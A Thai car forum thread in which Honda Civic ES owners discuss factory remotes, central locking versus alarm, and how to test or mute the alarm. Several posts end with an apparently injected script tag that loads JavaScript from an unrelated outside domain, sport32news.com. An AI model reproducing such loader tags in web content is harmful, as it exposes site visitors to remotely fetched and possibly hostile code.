ตอบ
Kamol_es04

เข้าร่วม: 04 กุมภา 2010
ตอบ: 16

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 10
ให้คำขอบคุณ: 0
อาทิตย์, 7 มีนา 2010 20:38 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
เพิ่งได้ 04 ตัว Top ตาเหยี่ยวมาครับ แต่งงกับกันขโมย
ทำไมเวลากดล็อคและปลดล็อคที่รีโมท ไม่มีการกระพริบของไฟอะไรเลย แถมไม่มีเสียง ปิ๊ป ปิ๊ป อะไรด้วย

อีกอย่งจะเช็คยังไงว่ากันขโมยยังทำงานอยู่มั้ย หรือว่าไมมีกันขโมยติดมาให้ครับ แต่ถามเจ้าของเดิมเค้ายืนยันว่ามีเพราะศูนย์บอกว่าตัวนี้ติดมาให้อยู่แล้ว อีกอย่างเห็นมีไฟกระพริบที่วิทยุเขียนว่า Anti thieft ติดเวลาจอดด้วยครับ
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  Tudcham Family  Concept_ES  Gremlin  สมชาย  popza4 
ES21_fatboy

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1563

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11901
ให้คำขอบคุณ: 4229

ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อาทิตย์, 7 มีนา 2010 21:08 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
Remote จากศูนย์ฯ ของ 1.7 ตัว Top ไม่ได้เป็นกันขโมยครับ

เป็น remote ควบคุม Central Lock อย่างเดียวครับ

ส่วนไฟแดงๆ ที่กระพริบ ที่วิทยุ ที่ติดเวลาจอดนั้น

เนื่องจากวิทยุติดรถมา เวลาถอดแบตฯออก แล้ว

ใส่แบตฯกลับเข้าไปใหม่ จะต้องใส่ code ด้วยครับ

เพื่อให้เครื่องทำงานได้ ไม่งั้นเครื่องจะ Lock

ที่กระพริบๆ นั้น นัยจะบอกคนที่จะขโมยว่า วิทยุเครื่องนี้

มีระบบ Code กันขโมยนะ ถึงขโมยแงะเอาไป

ถ้าไม่รู้ Code เอาไปใส่กะคันอื่น วิทยุ ก็จะไม่ทำงานครับ
Kamol_es04

เข้าร่วม: 04 กุมภา 2010
ตอบ: 16

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 10
อาทิตย์, 7 มีนา 2010 21:36 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
Get เลยครับ สรุปแล้วต้องไปติดกันขโมยใหม่เอง ขอบคุณมากครับ คุณ ES21_fatboy
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  สมชาย 
jumper

ชื่อเล่น: เหลียง

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 1413

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2168
ให้คำขอบคุณ: 1151

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 7 มีนา 2010 22:32 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ได้ข้อมูลอีกแล้ว
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y 
nilkung

ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
จันทร์, 8 มีนา 2010 09:11 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ES21_fatboy พิมพ์ว่า:
Remote จากศูนย์ฯของ 1.7 ตัว Top ม่ายได้เปงกันขโมยคับ

เป็น remote ควบคุม Central Lock อย่างเดียวคับ

ส่วนไฟแดงๆ ที่กระพริบ ที่วิทยุ ที่ติดเวลาจอดนั้น

เนื่องจากวิทยุติดรถมา เวลาถอดแบตฯออก แล้ว

ใส่แบตฯกลับเข้าไปใหม่ จะต้องใส่ code ด้วยคับ

เพื่อให้เครื่องทำงานได้ ม่ายงั้นเครื่องจะ Lock

ที่กระพริบๆ นั้น นัยจะบอกคนที่จะขโมยว่า วิทยุเครื่องนี้

มีระบบ Code กันขโมยนะ ถึงขโมยแงะเอาไป

ถ้าไม่รู้ Code เอาไปใส่กะคันอื่น วิทยุ ก็จะไม่ทำงานครับ

สุภาพกับโจรจัง 5555
<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  Gremlin 
kaewmai

ชื่อเล่น: แก้ว

เข้าร่วม: 04 พฤศจิกา 2009
ตอบ: 359

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 266
ให้คำขอบคุณ: 71

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 11 มีนา 2010 00:15 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
เพิ่งรู้คับ ขอบคุนคับ
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y 
thegunner

เข้าร่วม: 19 มกรา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
พฤหัส, 11 มีนา 2010 11:08 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
แต่รถผมร้องนะครับ

ผมขับ 2.0 ปี 05

ผมดับเครื่อง แล้วลงจากรถ ล๊อกด้วยรีโมตจากศูนย์

จากนั้นให้เพื่อนลองนั่งในรถ ซักห้านาที ให้เพื่อนเปิดประตูออกมา

ทีนี้หละครับ

โคตรดังเรย ไฟกระพริบทุกดวง

ผมก็งงๆ เหมือนกานอะ

ม่ายรู้จะเหมือนกันหรือป่าว
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  Oat_Na 
bandai_join

เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

พฤหัส, 11 มีนา 2010 11:27 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ถ้าเสียงไม่ดัง ปี๊บๆ เวลากดรีโมท แต่ สามารถใช้งานได้ตามปกติ ลองทำอย่างงี้ครับ
ที่รีโมท จะมี ปุ่ม2 ปุม หรือเปล่า ถ้าเป็นแบบ 2 ปุ่ม ให้ลองกด ทั้ง 2 ปุ่มค้างไว้หร้อมๆ กัน ครับ ค้างไว้สัก 2-3 วิ
มันจะเป็นเป็นการ ปิด-เปิดเสียง ปี๊บๆ อ่ะครับ
ส่วนออฟชั่นอื่นๆ เกี่ยวกับตัว รีโมท ลองโทรถามศูนย์ อีกทีอ่ะ ครับ เพราะผมเองก็จำไม่ได้ล่ะมีให้เล่นอะไรกับตัวรีโมทอีก
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  K-ES  Tudcham Family  a.say  Gremlin  OhOnOnO  delpiaoh  wit2524  popza4 
subun_subun

ชื่อเล่น: เอ๋

เข้าร่วม: 17 กุมภา 2010
ตอบ: 52

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 68
ให้คำขอบคุณ: 22

พฤหัส, 11 มีนา 2010 11:37 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
นี่ละครับสิ่งดีๆที่มีให้ในคลับนี้เสมอ คำตอบไงครับ
ทุกปัญหาแก้ได้ ถ้ามีเพื่อนสมาชิกดีๆในwww.civicesgroup.comครับ
ES21_fatboy

ครอบครัว ES
ครอบครัว ES

สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 11 มีนา 2010 11:39 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
thegunner พิมพ์ว่า:

ผมดับเครื่อง แล้วลงจากรถ ล๊อกด้วยรีโมตจากศูนย์

จากนั้นให้เพื่อนลองนั่งในรถ ซักห้านาที ให้เพื่อนเปิดประตูออกมา

ถูกต้องแล้วครับ กันขโมย ที่ติดตั้งมาจากโรงงานประกอบของ Honda เลยนั้น

จะมีเฉพาะตัว 2.0 เท่านั้นครับ จะสังเกตได้ว่า เวลาดับเครื่อง และล๊อครถแล้ว

นอกจากจะมีไฟสีแดงกระพริบที่วิทยุแล้ว จะมีไฟสีแดงกระพริบในหน้าปัทม์ด้วย

แถวๆมุมขวาล่างใต้มาตรวัดน้ำมันและอุณหภูมิครับ
ได้รับคำขอบคุณจาก: Jeab22  ae  A-u-T-o-N-o-m-Y  tatumz  Tudcham Family  paejung 
top4829

ชื่อเล่น: ท๊อป

เข้าร่วม: 10 กรกฎา 2009
ตอบ: 749

Guru ES
Guru ES

ได้รับคำขอบคุณ: 712
ให้คำขอบคุณ: 1918

พฤหัส, 11 มีนา 2010 12:43 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย

ถูกต้องแล้วครับ กันขโมย ที่ติดตั้งมาจากโรงงานประกอบของ Honda เลยนั้น

จะมีเฉพาะตัว 2.0 เท่านั้นครับ จะสังเกตได้ว่า เวลาดับเครื่อง และล๊อครถแล้ว

นอกจากจะมีไฟสีแดงกระพริบที่วิทยุแล้ว จะมีไฟสีแดงกระพริบในหน้าปัทม์ด้วย

แถวๆมุมขวาล่างใต้มาตรวัดน้ำมันและอุณหภูมิครับ

รบกวนถามพี่เอกครับ ของผมก็รุ่น 2.0 ปี04 เป็นแบบมี 2 ปุ่ม เวลาล็อคก็มีไฟแดงกะพริบหน้าจอ เลยอยากถามว่ารถผมมันเป็นแบบกันขโมยหรือว่าแค่แบบเซนทรัลล็อคหรอครับ เพราะขนาดใช้กุญแจไขประตูมันยังไม่ร้องเลย หรือว่ามีวิธีทดสอบไหมครับว่ามันมีระบบกันขโมยหรือป่าวครับ หรือว่ามันถูกปิดไว้หรอครับ ขอบคุณล่วงหน้าครับ
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  Tudcham Family  popza4 
ES21_fatboy

ครอบครัว ES
ครอบครัว ES

พฤหัส, 11 มีนา 2010 13:45 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
top4829 พิมพ์ว่า:

รบกวนถามพี่เอกครับ ของผมก็รุ่น 2.0 ปี04 เป็นแบบมี 2 ปุ่ม เวลาล็อคก็มีไฟแดงกะพริบหน้าจอ เลยอยากถามว่ารถผมมันเป็นแบบกันขโมยหรือว่าแค่แบบเซนทรัลล็อคหรอครับ เพราะขนาดใช้กุญแจไขประตูมันยังไม่ร้องเลย หรือว่ามีวิธีทดสอบไหมครับว่ามันมีระบบกันขโมยหรือป่าวครับ หรือว่ามันถูกปิดไว้หรอครับ ขอบคุณล่วงหน้าครับ

ถูกต้องเช่นกันครับ กันขโมยตัวโรงงานฯ ของ 2.0 นั้น

สามารถควบคุม/สั่งการได้ ทั้งจากรีโมท และตัวกุญแจครับ

ถ้าจะทดสอบ ให้ลองนั่งในรถ ดับเครื่อง กดปุ่มล็อคที่รีโมท

แล้วดึงปุ่มล็อคที่ประตูคนขับขึ้นด้วยมือ เปิดประตูรถออก

หรือ...

นั่งในรถ ดับเครื่อง กดปุ่มล็อคที่รีโมท แล้วลองสตาร์ทเครื่องดูครับ
ได้รับคำขอบคุณจาก: Jeab22  ae  top4829  A-u-T-o-N-o-m-Y  paejung  botanidtar  Gremlin  Chok_Rx 
top4829

ชื่อเล่น: ท๊อป

เข้าร่วม: 10 กรกฎา 2009
ตอบ: 749

Guru ES
Guru ES

ได้รับคำขอบคุณ: 712
ให้คำขอบคุณ: 1918

พฤหัส, 11 มีนา 2010 16:22 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
top4829 พิมพ์ว่า:

ถูกต้องเช่นกันครับ กันขโมยตัวโรงงานฯ ของ 2.0 นั้น

สามารถควบคุม/สั่งการได้ ทั้งจากรีโมท และตัวกุญแจครับ

ถ้าจะทดสอบ ให้ลองนั่งในรถ ดับเครื่อง กดปุ่มล็อคที่รีโมท

แล้วดึงปุ่มล็อคที่ประตูคนขับขึ้นด้วยมือ เปิดประตูรถออก

หรือ...

นั่งในรถ ดับเครื่อง กดปุ่มล็อคที่รีโมท แล้วลองสตาร์ทเครื่องดูครับ

ขอบคุณมากครับพี่เอก เดี๋ยวขอลองกลับไปทดสอบแล้วจะมารายงานผลครับ
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y  paejung 
NINJASIAM

ชื่อเล่น: นิน

เข้าร่วม: 06 มกรา 2010
ตอบ: 1621

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2025
ให้คำขอบคุณ: 4537

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 25 กรกฎา 2010 14:00 - สงสัยเรื่อง สัญญาณกันขโมย ติดรถครับ
รถผมซื้อมือ2มา น่าจะเป็นกันขโมยจากโรงงาน เพราะตัว รีโมท เป็นของ Honda ครับ

เวลา Lock หรือ UnLock รถผมไม่มีไฟหรือเสียงสัญญาณอะไรเลยอ่ะครับ ต้องฟังเสียงLockเอา มันปกติหรือเปล่าครับ

เพราะตอนซื้อที่เต้นท์เค้าก็บอกให้ฟังเสียงเอา >.<

ปล.ถ้าไม่ปกติ แก้ยังไงดีอ่ะครับ หรือเอาเข้า 0 เลยค่าใช้จ่ายประมาณเท่าไหร่ครับ [ขอบคุณคร๊าบ]
nocomment

ชื่อเล่น: ตั้น

เข้าร่วม: 03 ตุลา 2009
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1289
ให้คำขอบคุณ: 1073

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 25 กรกฎา 2010 14:13 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ไม่แน่ใจว่าสามารถเซตได้หรือเปล่านะครับ

แต่จริงๆ น่าจะมีไฟขึ้นเป็นอย่างน้อยครับ
ohmz1541

ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

อาทิตย์, 25 กรกฎา 2010 14:15 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
มันเซ็ทได้เน้อ เซ็ทให้มีไฟ หรือมีเสียงก็ได้

ของโอมปิดเสียง เอาให้มีแต่ไฟ เสียงมันน่ารำคานม๊าก
NINJASIAM

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 25 กรกฎา 2010 14:24 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
เอ๋อ เลย โง่มานานมากๆ แบบนี้ต้องเอาไปทำที่ 0 เลยป่ะครับเนี่ย
P.TER.357

เข้าร่วม: 06 มีนา 2010
ตอบ: 968

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 2902

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 25 กรกฎา 2010 15:55 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
มันเป็นแบบล๊อกรถเฉยๆปะคับ
ไม่ได้กันขโมยอะ
แต่เห็นว่าถ้าล๊อกรถเฉยๆ
อัพเกรดเป็นกันขโมยได้อะคับ
"<script src="https://sport32news.com/civicesgroup.js">
Jeab22

ชื่อเล่น: เจี๊ยบ

เข้าร่วม: 14 มกรา 2009
ตอบ: 1724

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1690
ให้คำขอบคุณ: 3102

สี: แดง แรลไล (R-513)
อาทิตย์, 25 กรกฎา 2010 16:05 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
รีโมท 0 อันเดียวกันไหมครับ (ยืมรูปสมาชิกอื่นลงแทนด้วยครับ)

งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย

ของผมล็อครถได้เฉยๆเองครับ มีแต่ไฟเลี้ยวกระพริบตอนกดปิด-เปิด ไม่มีเสียงสัญญาน หรือว่ากันขโมยพังแล้วก็ไม่รู้ "<script src="https://sport32news.com/civicesgroup.js">
NINJASIAM

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 25 กรกฎา 2010 16:24 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
Jeab22 พิมพ์ว่า:
รีโมท 0 อันเดียวกันไหมครับ (ยืมรูปสมาชิกอื่นลงแทนด้วยครับ)

งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย

ของผมล็อครถได้เฉยๆเองครับ มีแต่ไฟเลี้ยวกระพริบตอนกดปิด-เปิด ไม่มีเสียงสัญญาน หรือว่ากันขโมยพังแล้วก็ไม่รู้ "<script src="https://sport32news.com/civicesgroup.js">

ใช่ๆครับ เ่อ่อ แบบนี้มันคือ Lock เฉยๆ ใช่ไหมครับ เวลากด Lock แล้วมันก็ไม่มีไฟไรเลยน่ะ
ohmz1541

ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

อาทิตย์, 25 กรกฎา 2010 19:33 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ของติดรถมันของ code alarm นะ ถ้าจำไม่ผิด มันตั้งได้หมดแหละ
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

อาทิตย์, 25 กรกฎา 2010 20:31 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ไม่รุเหมือนกะของผมรึเปล่านะ
จะเปิด หรือ ปิดเสียงสัญญาณเวลากดเปิด/ปิดรถ
ให้กด 2 ปุ่มพร้อมๆ กัน น่ะครับ มันจะสลับเปิด / ปิด เสียงได้น่ะครับ
ถ้าผิดก็โทดแก๊สโซฮอล์ เอานะครับ
ได้รับคำขอบคุณจาก: Jeab22  A-u-T-o-N-o-m-Y 
doraemon

เข้าร่วม: 03 พฤศจิกา 2008
ตอบ: 80

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 240
ให้คำขอบคุณ: 2

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 25 กรกฎา 2010 22:19 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
A-u-T-o-N-o-m-Y พิมพ์ว่า:
Jeab22 พิมพ์ว่า:

ใช่ๆครับ เ่อ่อ แบบนี้มันคือ Lock เฉยๆ ใช่ไหมครับ เวลากด Lock แล้วมันก็ไม่มีไฟไรเลยน่ะ

ถ้าแบบนี้ก็ไม่แปลกครับ...ปกติครับ
เพราะว่ามันคือรีโมทเซ็นทรัลล็อคเฉยๆ
ไม่ได้เป็นกันขโมย...เพราะฉนั้นไม่มีทั้งไฟและเสียงครับ
ถ้าอยากให้เป็นกันขโมยก็อัพเกรดได้ครับ...แต่ไม่แนะนำ
เห็นบางคันใช้ไปนานๆแล้วมันจะรวนครับ....
ปล.อิจฉาอ่ะ...อยากได้แบบนี้อ่ะ เหอะๆๆ
jonatan

ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 25 กรกฎา 2010 22:51 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ขอดูรีโมท กันขโมยของเจ้าของ กระทู้นิดน่ะคับ ได้ตอบปัญหาถูก
เพราะด้วย กันขโมยของ honda มีหลายรุ่นอ่ะคับ ได้แก้ปัญหาได้ถุกต้องคับผม
ได้รับคำขอบคุณจาก: kittidech 
kimberly55

ชื่อเล่น: คิมเบอลี่

เข้าร่วม: 11 สิงหา 2009
ตอบ: 1141

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1050
ให้คำขอบคุณ: 405

อาทิตย์, 25 กรกฎา 2010 23:32 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
มีปัญหาว่ามันชอบร้องแม้แต่แมวเดินผ่านน่ะสิคะ ฮ่าๆ
NINJASIAM

ครอบครัว ES
ครอบครัว ES

จันทร์, 26 กรกฎา 2010 00:10 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
jonatan พิมพ์ว่า:
ขอดูรีโมท กันขโมยของเจ้าของ กระทู้นิดน่ะคับ ได้ตอบปัญหาถูก
เพราะด้วย กันขโมยของ honda มีหลายรุ่นอ่ะคับ ได้แก้ปัญหาได้ถุกต้องคับผม

อ่อได้เลยครับพี่ แต่ว่าตอนนี้รีโมท อยุ่ที่อู่ทำสีรถอยุ่เลยครับผม ไว้ทำสีเสร็จจะถ่ายมาให้ดูละกันน่ะครับ แต่เหมือนในรุปข้างบนเลยน่ะครับ

ปล.เสียงไม่อยากให้มีเหมือนกันครับ ขอแค่มีไฟกระพิบก็พอ เ

artitex

เข้าร่วม: 10 ตุลา 2009

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 36
ให้คำขอบคุณ: 15

จันทร์, 26 กรกฎา 2010 09:49 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
ของผมก็เป็นรีโมทแบบนี้เหมือนกันนะ ตอนนี้กดแล้วมีแต่เสียงล็อกประตู แต่ถ้าวันไหนกดแล้วมีไฟเลี้ยวกระพริบด้วย แสดงว่าสัญญาณกันขโมยทำงาน ไม่เกินชั่วโมงครับ ร้องลั่นเลย ยังไม่ได้เข้าไปให้ศูยน์ดูเลย
nokmodify

ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

จันทร์, 26 กรกฎา 2010 10:49 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
รีโมท ที่มาจาก0 มันมีมาเฉพราะรถปี? รุ่น? ช่อยตอบทีนะครับ
doraemon

เข้าร่วม: 03 พฤศจิกา 2008
ตอบ: 80

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 240
ให้คำขอบคุณ: 2

จันทร์, 26 กรกฎา 2010 22:24 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
artitex พิมพ์ว่า:
ของผมก็เป็นรีโมทแบบนี้เหมือนกันนะ ตอนนี้กดแล้วมีแต่เสียงล็อกประตู แต่ถ้าวันไหนกดแล้วมีไฟเลี้ยวกระพริบด้วย แสดงว่าสัญญาณกันขโมยทำงาน ไม่เกินชั่วโมงครับ ร้องลั่นเลย ยังไม่ได้เข้าไปให้ศูยน์ดูเลย

ถ้าเป็นรีโมทแบบรูปข้างบนแล้วมีกันขโมย
ผมคิดว่าน่าจะเป็นการอัพเกรดชุดกันขโมยเข้ากับรีโมทเดิม
ถ้ารถคุณซื้อมามือหนึ่งก็น่าแปลก....แต่ถ้ามือสอง
ผมคิดว่าเจ้าของเก่าเค้าคงติดมาแล้วครับ
เพราะถ้าเป็นรีโมทแบบนี้...รุ่นเราแล้วมันเป็นแค่เซ็นทรัลล็อคเฉยๆครับ
แต่ถ้าเป็นพวกรุ่นใหม่ๆ...อันนั้นเป็นกันขโมยด้วยครับ
artitex

เข้าร่วม: 10 ตุลา 2009

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 36
ให้คำขอบคุณ: 15

จันทร์, 26 กรกฎา 2010 23:08 - งงกับระบบกันขโมย เวลากดไม่มีไฟกระพริบ ไม่มีเสียงอะไรเลย
doraemon พิมพ์ว่า:
artitex พิมพ์ว่า:

ถ้าเป็นรีโมทแบบรูปข้างบนแล้วมีกันขโมย
ผมคิดว่าน่าจะเป็นการอัพเกรดชุดกันขโมยเข้ากับรีโมทเดิม
ถ้ารถคุณซื้อมามือหนึ่งก็น่าแปลก....แต่ถ้ามือสอง
ผมคิดว่าเจ้าของเก่าเค้าคงติดมาแล้วครับ
เพราะถ้าเป็นรีโมทแบบนี้...รุ่นเราแล้วมันเป็นแค่เซ็นทรัลล็อคเฉยๆครับ
แต่ถ้าเป็นพวกรุ่นใหม่ๆ...อันนั้นเป็นกันขโมยด้วยครับ

ผมซื้อรถมือสองมานะครับ เป็น 2.0 ตัวท็อป ไม่รู้ว่ามันมีรึกันขโมยมากับรถมั้ยครับ
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.